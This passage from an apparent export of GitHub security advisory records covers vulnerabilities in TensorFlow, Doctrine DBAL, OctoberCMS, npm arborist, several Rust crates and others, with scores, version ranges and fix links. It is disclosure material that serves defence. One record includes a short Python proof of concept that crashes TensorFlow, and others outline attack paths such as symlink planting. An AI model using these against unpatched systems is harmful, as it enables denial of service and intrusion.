will issue fixes as these are discovered. + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported externally via [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46890), [GitHub issue](https://github.com/tensorflow/tensorflow/issues/51618) and [GitHub issue](https://github.com/tensorflow/tensorflow/issues/51908).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-prcg-wp5q-rv7p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41197'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/issues/46890'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/issues/51908'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/7c1692bd417eb4f9b33ead749a41166d6080af85'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/a871989d7b6c18cdebf2fb4f0e5c5b62fbc19edf'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/d81b1351da3e8c884ff836b64458d94e4a157c15'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-190'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:54:14Z', 'nvd_published_at': '2021-11-05T20:15:00Z'}" +1.4.0,GHSA-r7cj-8hjg-x622,2021-12-16T14:11:44Z,2021-11-16T17:25:57Z,,['CVE-2021-43608'],DBAL 3 SQL Injection Security Vulnerability,"We have released a new version Doctrine DBAL 3.1.4 that fixes a critical SQL injection vulnerability in the LIMIT clause generation API provided by the Platform abstraction. + +We advise everyone using Doctrine DBAL 3.0.0 up to 3.1.3 to upgrade to 3.1.4 immediately. + +The vulnerability can happen when unsanitized input is passed to many APIs in Doctrine DBAL and ORM that ultimately end up calling `AbstractPlatform::modifyLimitQuery`. + +As a workaround you can cast all limit and offset parameters to integers before passing them to Doctrine APIs. + +This vulnerability has been assigned [CVE-2021-43608](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43608). +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'doctrine/dbal'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.1.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/doctrine/dbal/security/advisories/GHSA-r7cj-8hjg-x622'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43608'}, {'type': 'WEB', 'url': 'https://github.com/doctrine/dbal/commit/9dcfa4cb6c03250b78a84737ba7ceb82f4b7ba4d'}, {'type': 'PACKAGE', 'url': 'https://github.com/doctrine/dbal/'}, {'type': 'WEB', 'url': 'https://github.com/doctrine/dbal/releases'}, {'type': 'WEB', 'url': 'https://www.doctrine-project.org/2021/11/11/dbal3-vulnerability-fixed.html'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T22:34:32Z', 'nvd_published_at': '2021-12-09T20:15:00Z'}" +1.4.0,GHSA-93g4-3phc-g4xw,2021-11-03T14:48:56Z,2021-11-03T17:30:18Z,,['CVE-2021-27644'],SQL injection in Apache DolphinScheduler ,"In Apache DolphinScheduler before 1.3.6 versions, authorized users can use SQL injection in the data source center. (Only applicable to MySQL data source with internal login account password)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.dolphinscheduler:dolphinscheduler-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27644'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r35d6acf021486a390a7ea09e6650c2fe19e72522bd484791d606a6e6%40%3Cdev.dolphinscheduler.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r35d6acf021486a390a7ea09e6650c2fe19e72522bd484791d606a6e6@%3Cdev.dolphinscheduler.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/01/3'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-02T18:48:35Z', 'nvd_published_at': '2021-11-01T10:15:00Z'}" +1.4.0,GHSA-x3v8-c8qx-3j3r,2021-11-08T22:22:42Z,2021-11-10T18:57:45Z,,['CVE-2021-41215'],Null pointer exception in `DeserializeSparse`,"### Impact +The [shape inference code for `DeserializeSparse`](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/ops/sparse_ops.cc#L152-L168) can trigger a null pointer dereference: + +```python +import tensorflow as tf + +dataset = tf.data.Dataset.range(3) + +@tf.function +def test(): + y = tf.raw_ops.DeserializeSparse( + serialized_sparse=tf.data.experimental.to_variant(dataset), + dtype=tf.int32) + +test() +``` + +This is because the shape inference function assumes that the `serialize_sparse` tensor is a tensor with positive rank (and having `3` as the last dimension). However, in the example above, the argument is a scalar (i.e., rank 0). + +### Patches +We have patched the issue in GitHub commit [d3738dd70f1c9ceb547258cbb82d853da8771850](https://github.com/tensorflow/tensorflow/commit/d3738dd70f1c9ceb547258cbb82d853da8771850). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-x3v8-c8qx-3j3r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41215'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/d3738dd70f1c9ceb547258cbb82d853da8771850'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-476'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:22:42Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}" +1.4.0,GHSA-wqxc-qrq4-w5v4,2022-06-15T19:41:46Z,2021-08-25T21:01:33Z,,['CVE-2020-36213'],Update unsound DrainFilter and RString::retain,"An issue was discovered in the abi_stable crate before 0.9.1 for Rust. A retain call can create an invalid UTF-8 string, violating soundness.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'abi_stable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36213'}, {'type': 'WEB', 'url': 'https://github.com/rodrimati1992/abi_stable_crates/issues/44'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0105.html'}]","{'cwe_ids': ['CWE-172'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T17:18:54Z', 'nvd_published_at': '2021-01-26T18:15:00Z'}" +1.4.0,GHSA-cfpj-3q4c-jhvr,2021-08-24T16:24:24Z,2021-08-25T14:40:38Z,,['CVE-2021-37680'],Division by zero in TFLite,"### Impact +The implementation of fully connected layers in TFLite is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/fully_connected.cc#L226): + +```cc +const int batch_size = input_size / filter->dims->data[1]; +``` + +An attacker can craft a model such that `filter->dims->data[1]` is 0. + +### Patches +We have patched the issue in GitHub commit [718721986aa137691ee23f03638867151f74935f](https://github.com/tensorflow/tensorflow/commit/718721986aa137691ee23f03638867151f74935f). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360. Concurrently, it has also been reported by Yakun Zhang of Baidu Security.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cfpj-3q4c-jhvr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37680'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/718721986aa137691ee23f03638867151f74935f'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T16:24:24Z', 'nvd_published_at': '2021-08-12T22:15:00Z'}" +1.4.0,GHSA-cmhx-cq75-c4mj,2023-02-21T18:57:08Z,2021-08-04T21:03:46Z,,['CVE-2019-0820'],Regular Expression Denial of Service in System.Text.RegularExpressions,"A denial of service vulnerability exists when .NET Framework and .NET Core improperly process RegEx strings, aka '.NET Framework and .NET Core Denial of Service Vulnerability'. This CVE ID is unique from CVE-2019-0980, CVE-2019-0981.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'System.Text.RegularExpressions'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0820'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2019:1259'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0820'}]","{'cwe_ids': ['CWE-1333', 'CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-04T21:03:27Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}" +1.4.0,GHSA-gf93-h79q-6jjv,2023-06-13T21:57:16Z,2021-08-25T20:45:41Z,,['CVE-2019-25006'],Incorrect implementation of the Streebog hash functions in streebog,Internal update-sigma function was implemented incorrectly and depending on debug-assertions it could've caused an incorrect result or panic for certain inputs.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'streebog'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25006'}, {'type': 'WEB', 'url': 'https://github.com/RustCrypto/hashes/pull/91'}, {'type': 'PACKAGE', 'url': 'https://github.com/RustCrypto/hashes/tree/master/streebog'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0030.html'}]","{'cwe_ids': ['CWE-327'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:20:49Z', 'nvd_published_at': None}" +1.4.0,GHSA-6gvc-4jvj-pwq4,2021-09-27T15:46:50Z,2021-08-30T16:22:34Z,,['CVE-2018-25001'],Use after free in libpulse-binding,An issue was discovered in the libpulse-binding crate before 2.5.0 for Rust. proplist::Iterator can cause a use-after-free. ,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'libpulse-binding'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.5'}, {'fixed': '2.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-25001'}, {'type': 'PACKAGE', 'url': 'https://github.com/jnqnfe/pulse-binding-rust'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0020.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T20:05:15Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}" +1.4.0,GHSA-3vv3-frrq-6486,2021-08-24T19:10:18Z,2021-08-25T20:59:20Z,,['CVE-2020-36432'],Use of Uninitialized Resource in alg_ds,"An issue was discovered in the alg_ds crate through 2020-08-25 for Rust. `Matrix::new()` internally calls `Matrix::fill_with()` which uses `*ptr = value` pattern to initialize the buffer. This pattern assumes that there is an initialized struct at the address and drops it, which results in dropping of uninitialized struct.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'alg_ds'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36432'}, {'type': 'PACKAGE', 'url': 'https://gitlab.com/dvshapkin/alg-ds'}, {'type': 'WEB', 'url': 'https://gitlab.com/dvshapkin/alg-ds/-/issues/1'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0033.html'}]","{'cwe_ids': ['CWE-665', 'CWE-908'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T21:22:58Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-r2x6-vrxx-jgv4,2023-06-13T18:34:57Z,2021-08-25T20:58:07Z,,['CVE-2020-36463'],Data races in multiqueue,"Affected versions of this crate unconditionally implemented Send for types used in queue implementations (InnerSend, InnerRecv, FutInnerSend, FutInnerRecv). This allows users to send non-Send types to other threads, which can lead to data race bugs or other undefined behavior.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'multiqueue'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36463'}, {'type': 'WEB', 'url': 'https://github.com/schets/multiqueue/issues/31'}, {'type': 'PACKAGE', 'url': 'https://github.com/schets/multiqueue'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/multiqueue/RUSTSEC-2020-0143.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0143.html'}]","{'cwe_ids': ['CWE-362', 'CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:19:09Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-3837-87vh-xq3w,2023-06-13T22:35:33Z,2021-08-25T20:57:07Z,,['CVE-2020-36447'],Data race in v9,"Affected versions of this crate unconditionally implement Sync for SyncRef. This definition allows data races if &T is accessible through &SyncRef. + +SyncRef derives Clone and Debug, and the default implementations of those traits access &T by invoking T::clone() & T::fmt(). It is possible to create data races & undefined behavior by concurrently invoking SyncRef::clone() or SyncRef::fmt() from multiple threads with T: !Sync.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'v9'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.43'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36447'}, {'type': 'WEB', 'url': 'https://github.com/purpleposeidon/v9/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/purpleposeidon/v9/commit/18847c50e5d36561cc91c996c3539ddb1eacf6c7'}, {'type': 'PACKAGE', 'url': 'https://github.com/purpleposeidon/v9'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/v9/RUSTSEC-2020-0127.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0127.html'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:31:57Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-mxr5-mc97-63rc,2022-07-05T18:06:21Z,2021-08-30T16:13:02Z,,['CVE-2021-32648'],Account Takeover in Octobercms,"### Impact + +An attacker can request an account password reset and then gain access to the account using a specially crafted request. + +- To exploit this vulnerability, an attacker must know the username of an administrator and have access to the password reset form. + +### Patches + +- Issue has been patched in Build 472 and v1.1.5 +- [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648) + +### Workarounds + +Apply https://github.com/octobercms/library/commit/016a297b1bec55d2e53bc889458ed2cb5c3e9374 and https://github.com/octobercms/library/commit/5bd1a28140b825baebe6becd4f7562299d3de3b9 to your installation manually if you are unable to upgrade. + +[**Update 2022-01-20**] [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648) can be found here. + +### Recommendations + +We recommend the following steps to make sure your server stays secure: + +- Keep server OS and system software up to date. +- Keep October CMS software up to date. +- Use a multi-factor authentication plugin. +- Change the [default backend URL](https://github.com/octobercms/october/blob/1.1/config/cms.php#L39) or block public access to the backend area. +- Include the [Roave/SecurityAdvisories](https://github.com/Roave/SecurityAdvisories) Composer package to ensure that your application doesn't have installed dependencies with known security vulnerabilities. + +### References + +Bugs found as part of Solar Security CMS Research. Credits to: +• Andrey Basarygin +• Andrey Guzei +• Mikhail Khramenkov +• Alexander Sidukov +• Maxim Teplykh + +### For more information +If you have any questions or comments about this advisory: +* Email us at [hello@octobercms.com](mailto:hello@octobercms.com) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'october/system'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.472'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'october/system'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.1'}, {'fixed': '1.1.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/octobercms/october/security/advisories/GHSA-mxr5-mc97-63rc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32648'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/library/commit/016a297b1bec55d2e53bc889458ed2cb5c3e9374'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/library/commit/5bd1a28140b825baebe6becd4f7562299d3de3b9'}, {'type': 'PACKAGE', 'url': 'https://github.com/octobercms/october'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T20:14:45Z', 'nvd_published_at': '2021-08-26T19:15:00Z'}" +1.4.0,GHSA-c676-mcw3-qg55,2021-08-27T12:48:30Z,2021-08-25T14:50:08Z,,['CVE-2021-3730'],firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF),firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'grumpydictator/firefly-iii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3730'}, {'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/commit/f80178b1b2b7864d17500a131d570c353c9a26f6'}, {'type': 'PACKAGE', 'url': 'https://github.com/firefly-iii/firefly-iii/'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/ea181323-51f8-46a2-a60f-6a401907feb7'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T20:03:09Z', 'nvd_published_at': '2021-08-23T13:15:00Z'}" +1.4.0,GHSA-gmw6-94gg-2rc2,2022-06-17T20:51:19Z,2021-08-31T16:03:34Z,,['CVE-2021-39135'],UNIX Symbolic Link (Symlink) Following in @npmcli/arborist,"### Impact + +Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution + +`@npmcli/arborist`, the library that calculates dependency trees and manages the node_modules folder hierarchy for the npm command line interface, aims to guarantee that package dependency contracts will be met, and the extraction of package contents will always be performed into the expected folder. + +This is accomplished by extracting package contents into a project's `node_modules` folder. + +If the `node_modules` folder of the root project or any of its dependencies is somehow replaced with a symbolic link, it could allow Arborist to write package dependencies to any arbitrary location on the file system. + +Note that symbolic links contained within package artifact contents are filtered out, so another means of creating a `node_modules` symbolic link would have to be employed. + +1. A `preinstall` script could replace `node_modules` with a symlink. (This is prevented by using `--ignore-scripts`.) +2. An attacker could supply the target with a git repository, instructing them to run `npm install --ignore-scripts` in the root. This may be successful, because `npm install --ignore-scripts` is typically not capable of making changes outside of the project directory, so it may be deemed safe. + +### Patches + +2.8.2 (included in npm v7.20.7 and above) + +### Workarounds + +Do not run `npm install` on untrusted codebases, without first ensuring that the `node_modules` directory in the project is not a symbolic link. + +### Fix + +Prior to extracting any package contents, the `node_modules` folder into which it is extracted is verified to be a real directory. If it is not, then it is removed. + +Caveat: if you are currently relying on creating a symbolic link to the `node_modules` folder in order to share dependencies between projects, then that will no longer be possible. Please use the `npm link` command, explicit `file:...` dependencies, and/or `workspaces` to share dependencies in a development environment.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@npmcli/arborist'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/npm/arborist/security/advisories/GHSA-gmw6-94gg-2rc2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39135'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/npm/arborist'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@npmcli/arborist'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-59', 'CWE-61'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-31T16:03:00Z', 'nvd_published_at': '2021-08-31T17:15:00Z'}" +1.4.0,GHSA-64j8-7gp2-xjx5,2023-06-13T22:26:24Z,2021-08-25T20:50:28Z,,['CVE-2020-35924'],Data races in try-mutex,"Affected versions of this crate unconditionally implemented Sync trait for TryMutex type. This allows users to put non-Send T type in TryMutex and send it to another thread, which can cause a data race. The flaw was corrected in the 0.3.0 release by adding T: Send bound for the Sync trait implementation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'try-mutex'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35924'}, {'type': 'WEB', 'url': 'https://github.com/mpdn/try-mutex/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/mpdn/try-mutex'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0087.html'}]","{'cwe_ids': ['CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:54:53Z', 'nvd_published_at': None}" +1.4.0,GHSA-pp2h-95hm-hv9r,2021-08-27T12:49:12Z,2021-08-30T16:13:13Z,,['CVE-2021-37702'],Improper Neutralization of Formula Elements in a CSV File in pimcore/pimcore,"### Impact +Data Object CSV import allows formular injection. + +### Patches 